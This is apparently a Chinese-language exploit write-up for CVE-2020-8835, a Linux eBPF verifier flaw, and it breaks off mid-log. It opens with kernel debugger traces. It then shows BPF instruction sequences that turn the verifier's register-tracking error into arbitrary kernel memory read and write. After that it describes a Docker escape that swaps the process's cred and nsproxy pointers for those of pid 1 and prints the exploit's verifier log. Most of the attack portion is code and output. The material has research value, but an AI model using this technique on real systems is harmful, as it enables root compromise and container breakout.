0xffffffff83ab2058 <copy_user_generic_unrolled+152> and edx, edx
0xffffffff83ab205a <copy_user_generic_unrolled+154> je 0xffffffff83ab206c <copy_user_generic_unrolled+172>
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+92 ────
87 andl $7,%edx
88 shrl $3,%ecx
89 jz 20f
90 18: movq (%rsi),%r8
91 19: movq %r8,(%rdi)
→ 92 leaq 8(%rsi),%rsi
93 leaq 8(%rdi),%rdi
94 decl %ecx
95 jnz 18b
96 20: andl %edx,%edx
97 jz 23f
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab204c in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab204c → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe0, to=0xffff88806af87b40)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤
93 leaq 8(%rdi),%rdi
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe8 → 0x0000000000000015 → 0x0000000000000015
$rdi : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rip : 0xffffffff83ab2050 → 0xee75c9ff087f8d48 → 0xee75c9ff087f8d48
$r8 : 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab2045 <copy_user_generic_unrolled+133> adc cl, BYTE PTR [rbx+rcx*4+0x6]
0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
→ 0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
0xffffffff83ab2058 <copy_user_generic_unrolled+152> and edx, edx
0xffffffff83ab205a <copy_user_generic_unrolled+154> je 0xffffffff83ab206c <copy_user_generic_unrolled+172>
0xffffffff83ab205c <copy_user_generic_unrolled+156> mov ecx, edx
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+93 ────
88 shrl $3,%ecx
89 jz 20f
90 18: movq (%rsi),%r8
91 19: movq %r8,(%rdi)
92 leaq 8(%rsi),%rsi
→ 93 leaq 8(%rdi),%rdi
94 decl %ecx
95 jnz 18b
96 20: andl %edx,%edx
97 jz 23f
98 movl %edx,%ecx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab2050 in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab2050 → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe8, to=0xffff88806af87b40)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤
94 decl %ecx
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe8 → 0x0000000000000015 → 0x0000000000000015
$rdi : 0xffff88806af87b48 → 0xffff888066060850 → (bad)
$rip : 0xffffffff83ab2054 → 0x1074d221ee75c9ff → 0x1074d221ee75c9ff
$r8 : 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
→ 0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
0xffffffff83ab2058 <copy_user_generic_unrolled+152> and edx, edx
0xffffffff83ab205a <copy_user_generic_unrolled+154> je 0xffffffff83ab206c <copy_user_generic_unrolled+172>
0xffffffff83ab205c <copy_user_generic_unrolled+156> mov ecx, edx
0xffffffff83ab205e <copy_user_generic_unrolled+158> mov al, BYTE PTR [rsi]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+94 ────
89 jz 20f
90 18: movq (%rsi),%r8
91 19: movq %r8,(%rdi)
92 leaq 8(%rsi),%rsi
93 leaq 8(%rdi),%rdi
→ 94 decl %ecx
95 jnz 18b
96 20: andl %edx,%edx
97 jz 23f
98 movl %edx,%ecx
99 21: movb (%rsi),%al
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab2054 in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab2054 → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe8, to=0xffff88806af87b48)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ info registers cr4
cr4 0x3006f0 [ SMAP SMEP OSXMMEXCPT OSFXSR PGE MCE PAE PSE ]

0x02 从map读任意值

思路是这样,参考安全客,我们利用操作将r6置为1(内核认为是0),然后将从map读一个值到r8,然后,r6乘r8,这样就可以任意地址读写了,想象很美好,发现相乘之后,r6的就成未知状态了。。。。

0x00 绕过

既然这样不信,我觉得可以采用多次bpf程序的方法,就是每次load程序只用一次,用完之后close这个bpf程序,然后修改和r6相乘的立即数,从而实现任意读写,然后发现mov的时候,立即数只能是32位,那么,可以通过,以下操作实现,

1
2
3
4
5
mov r8,r6
mul r6,low 32bit
mul r8,high 32bit
r8=<<32
add r6,r8

其实最简单的就是通过BPF_LD_IMM64指令来做这个操作,然后发现map的最大的value size是32bit,也是就说,还是不能任意读写,只能向后越界读写4gb,所以,下面,还有一种思路,既然,key和value的类型都是u32,以array为例,当你look_up_elem会调用array_map_lookup_elem

1
2
3
4
5
6
7
8
9
10
static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = *(u32 *)key;

if (unlikely(index >= array->map.max_entries))
return NULL;

return array->value + array->elem_size * (index & array->index_mask);
}

那么看这个函数,如果我们把elem_size、index_mask和max_entries改成0xffffffff,这样的话,下一次load map时候,就可以实现任意地址读写,有点复杂,就没去试,应该可行,当时没那样做是因为,分割地址,太复杂了,现在想想,没有这么复杂,你想任意读写一个地址,你只需要把

1
2
3
offset_address=address-array->value
index=offset_address>>32
offset=offset_address%0x100000000

然后

1
2
3
4
5
6
7
8
9
10
      BPF_ALU64_IMM(BPF_MOV,BPF_REG_6,index),
BPF_STX_MEM(BPF_DW,BPF_REG_10,BPF_REG_6,-8),
BPF_MOV64_REG(BPF_REG_2,BPF_REG_10),
BPF_ADD64_IMM(BPF_REG_2,-8),
BPF_LD_MAP_FD(BPF_REG_1,cmd_fd),
BPF_MAP_LOOKUP(),
BPF_JMP_IMM(BPF_JNE,BPF_REG_0,0,1),
BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,offset),
BPF_ALU64_IMM(BPF_MOV,BPF_REG_0,0)

应该能成功,如果check不过,可以考虑将r6=1(内核认为是0),然后mul r6,index,这样应该能够成功

0x05 提权并docker逃逸

当时我其他任意读写的方案都被否决之后,我只能按照zdi的方法提权,这个漏洞是可以docker逃逸的,参考

1
2
3
4
5
使用内核漏洞进入内核上下文
获取当前进程的task struct
回溯 task list 获取 pid = 1 的 task struct,复制其相关数据
切换当前 namespace
打开 root shell,完成逃逸

然后就是zdi就是这种提权方法,首先说个小坑,因为是zdi那种方法是任意读写4个字节,然而我们读一个地址是8个字节,这样的话,就免不了强制转换,强制转换的话建议用unsigned int 而不是int,因为如果用int转换成uint64_t 的时候符号位会扩展,导致低32位扩展的时候,高32位全为1,导致任意地址读对了,但是解析错了,后面用的也错了

如果我们要用这个漏洞逃逸的话,我们首先得有一些预备知识,zdi也讲了,这里说一下

0x00 init_pid_ns

1
2
3
4
5
6
7
8
9
10
11
12
13
struct pid_namespace init_pid_ns = {
.kref = KREF_INIT(2),
.idr = IDR_INIT(init_pid_ns.idr),
.pid_allocated = PIDNS_ADDING,
.level = 0,
.child_reaper = &init_task,
.user_ns = &init_user_ns,
.ns.inum = PROC_PID_INIT_INO,
#ifdef CONFIG_PID_NS
.ns.ops = &pidns_operations,
#endif
};
EXPORT_SYMBOL_GPL(init_pid_ns);

init_pid_ns 是一个全局变量,所以我们可以通过偏移找到他,是进程默认的namespace,然后看到child_reaper有init_task的地址,init_task就是我们pid 1的地址,然后,在task_struct结构体中,有一个tasks的结构体,

1
struct list_head		tasks;

用于把所有的进程都串联起来,在普及一下list_head结构

1
2
3
struct list_head {
struct list_head *next, *prev;
};

他有两个成员,next和prev,在task_struct中,this_task.tasks->next=next_task.tasks,所以,我们就一个遍历所有的进程,找到自己的进程通过比较pid

task_struct还有一个结构体指针

1
2
/* Namespaces: */
struct nsproxy *nsproxy;

这个就是进程的namespaces啦,所以,我们改他就可以逃逸了

0x01 逃逸思路

首先通过leak ops address和任意读,leak init_task的address,然后通过tasks链表,遍历系统所有进程找到自己进程的地址,然后,改自己的cred结构体地址为pid 1的cred结构体地址,把的nsproxy的结构体地址为pid 1的nsproxy的结构体地址,最后还有个小问题,就是,如果你这样做了,在拿到root shell之后,exit,kasan 就会检测到uaf,这是因为nsproxy和cred结构体都有一个usage的变量,用来记录引用的次数,但是,由于,我们是直接引用的,没有加usage,导致的还有引用的时候,把cred和nsproxy结构体free掉了,造成uaf,所以,我们手动加一下就很完美了

0x02 运行效果

遍历系统所有进程的时候,还挺有意思的,感觉自己跟god一样 hhh,完整exploit不放了,给一下运行时的log

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
pwnht@syzkaller:~/cve-2020-8835$ whoami
pwnht
pwnht@syzkaller:~/cve-2020-8835$ ls -l
total 68
-rwxr-xr-x. 1 pwnht pwnht 23680 Apr 28 09:01 exp
-rw-r--r--. 1 root root 16902 Apr 28 09:00 exp.c
-rwxr-xr-x. 1 pwnht pwnht 13824 Apr 13 06:34 exp1
-rwxrwxrwx. 1 root root 6632 Apr 24 07:29 poc.c
pwnht@syzkaller:~/cve-2020-8835$ ./exp
cmd_fd=3
input_fd=4
output_fd=5
progfd=6
0: (b7) r6 = 0
1: (7b) *(u64 *)(r10 -8) = r6
2: (bf) r2 = r10
3: (07) r2 += -8
4: (18) r1 = 0x0
6: (85) call bpf_map_lookup_elem#1
7: (55) if r0 != 0x0 goto pc+1
R0_w=invP0 R6_w=invP0 R10=fp0 fp-8_w=0000mmmm
8: (95) exit

from 7 to 9: R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6=invP0 R10=fp0 fp-8=0000mmmm
9: (79) r6 = *(u64 *)(r0 +0)
R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6_w=invP0 R10=fp0 fp-8=0000mmmm
10: (79) r9 = *(u64 *)(r0 +8)
R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6_w=invP(id=0) R10=fp0 fp-8=0000mmmm
11: (55) if r9 != 0x0 goto pc+2
R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6_w=invP(id=0) R9_w=invP0 R10=fp0 fp-8=0000mmmm
12: (b7) r0 = 0
13: (95) exit

from 11 to 14: R0=map_value(id=0,off=0,ks=4,vs=16,imm=0) R6_w=invP(id=0) R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
14: (b7) r0 = 0
15: (35) if r6 >= 0x1 goto pc+1
R0_w=invP0 R6_w=invP0 R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
16: (95) exit

from 15 to 17: R0=invP0 R6=invP(id=0,umin_value=1) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
17: (b7) r8 = 1
18: (67) r8 <<= 32
19: (07) r8 += 1
20: (bd) if r6 <= r8 goto pc+1
R0=invP0 R6=invP(id=0,umin_value=4294967298) R8_w=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
21: (95) exit

from 20 to 22: R0=invP0 R6=invP(id=0,umin_value=1,umax_value=4294967297,var_off=(0x0; 0x1ffffffff)) R8_w=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
22: (56) if w6 != 0x0 goto pc+1
R0=invP0 R6=invP(id=0,umin_value=1,umax_value=4294967297,var_off=(0x1; 0x100000000)) R8_w=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
23: (95) exit

from 22 to 24: R0=invP0 R6=invP(id=0,umin_value=1,umax_value=4294967297,var_off=(0x1; 0x100000000)) R8_w=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
24: (57) r6 &= 2
25: (74) w6 >>= 1
26: (24) w6 *= 400
27: (b7) r7 = 0
28: (7b) *(u64 *)(r10 -8) = r7
29: (bf) r2 = r10
30: (07) r2 += -8
31: (18) r1 = 0x0
33: (85) call bpf_map_lookup_elem#1
34: (55) if r0 != 0x0 goto pc+1
R0=invP0 R6=invP0 R7=invP0 R8=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
35: (95) exit

from 34 to 36: R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=invP0 R8=invP4294967297 R9=invP(id=0) R10=fp0 fp-8=0000mmmm
36: (bf) r8 = r0
37: (b7) r0 = 0
38: (1f) r8 -= r6
R0_w=invP0 R6=invP0 R7=invP0 R8_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
39: (b7) r7 = 0
40: (7b) *(u64 *)(r10 -8) = r7
41: (bf) r2 = r10
42: (07) r2 += -8
43: (18) r1 = 0x0
45: (85) call bpf_map_lookup_elem#1
46: (55) if r0 != 0x0 goto pc+1
R0=invP0 R6=invP0 R7=invP0 R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
47: (95) exit

from 46 to 48: R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=invP0 R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
48: (bf) r7 = r0
49: (55) if r9 != 0x1 goto pc+6
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP1 R10=fp0 fp-8=0000mmmm
50: (79) r9 = *(u64 *)(r8 +0)
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9_w=invP1 R10=fp0 fp-8=0000mmmm
51: (7b) *(u64 *)(r7 +0) = r9
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
52: (79) r9 = *(u64 *)(r8 +288)
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
53: (7b) *(u64 *)(r7 +8) = r9
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7_w=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9_w=invP(id=0) R10=fp0 fp-8=0000mmmm
54: (b7) r0 = 0
55: (95) exit

from 49 to 56: R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
56: (55) if r9 != 0x3 goto pc+7
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
57: (79) r4 = *(u64 *)(r7 +0)
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
58: (7b) *(u64 *)(r8 +0) = r4
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
59: (62) *(u32 *)(r8 +24) = 23
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
60: (62) *(u32 *)(r8 +36) = -1
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
61: (62) *(u32 *)(r8 +44) = 0
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R4_w=invP(id=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP3 R10=fp0 fp-8=0000mmmm
62: (b7) r0 = 0
63: (95) exit

from 56 to 64: R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
64: (79) r4 = *(u64 *)(r7 +0)
R0=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R6=invP0 R7=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R8=map_value(id=0,off=0,ks=4,vs=4096,imm=0) R9=invP(id=0) R10=fp0 fp-8=0000mmmm
65: (7b) *(u64 *)(r8 +64) = r4
